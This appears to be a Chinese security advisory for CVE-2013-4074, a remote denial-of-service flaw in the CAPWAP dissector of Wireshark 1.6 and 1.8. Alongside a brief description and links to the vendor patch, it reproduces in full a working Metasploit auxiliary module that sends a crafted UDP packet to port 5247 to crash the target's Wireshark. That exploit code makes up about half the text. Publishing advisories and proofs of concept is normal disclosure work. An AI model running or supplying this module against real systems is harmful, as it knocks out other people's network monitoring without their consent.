Wireshark CAPWAP Dissector packet-capwap.c dissect_capwap_

发布日期：2014-05-29
更新日期：2014-06-02

受影响系统：
Wireshark Wireshark 1.x
描述：
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-4074
 
Wireshark是最流行的网络协议解析器。
 
Wireshark中，packet-capwap.c里的函数dissect_capwap_data在CAPWAP解析器内的实现上存在远程拒绝服务漏洞，此漏洞可在处理特制数据包时触发，导致应用崩溃。
 
<*来源：Laurent Butti （[email protected]）
 
  链接：http://osvdb.org/show/osvdb/94091
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Laurent Butti （[email protected]）提供了如下测试方法：
 #
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Wireshark CAPWAP Dissector DoS',
      'Description'    => %q{
        This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
        to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
        incomplete packet.
      },
      'License'        => MSF_LICENSE,
      'Author'        =>
        [
          'Laurent Butti', # Discovery vulnerability
          'j0sm1'  # Auxiliary msf module
        ],
      'References'    =>
        [
          ['CVE', '2013-4074'],
          ['OSVDB', '94091'],
          ['BID', '60500']
        ],
      'DisclosureDate' => 'Apr 28 2014'))

    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
    register_options([ Opt::RPORT(5247) ], self.class)
  end

  def run

    connect_udp

    # We send a packet incomplete to crash dissector
    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
    # the dissector crash
    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
    udp_sock.put(buf)

    disconnect_udp

  end
 end

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Wireshark
 ---------
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://www.wireshark.org/security/wnpa-sec-2013-32.html
 http://anonsvn.wireshark.org/viewvc/trunk/epan/dissectors/packet-capwap.c?r1=43716&r2=43715&pathrev=43716

Wireshark 的详细介绍：请点这里
Wireshark 的下载地址：请点这里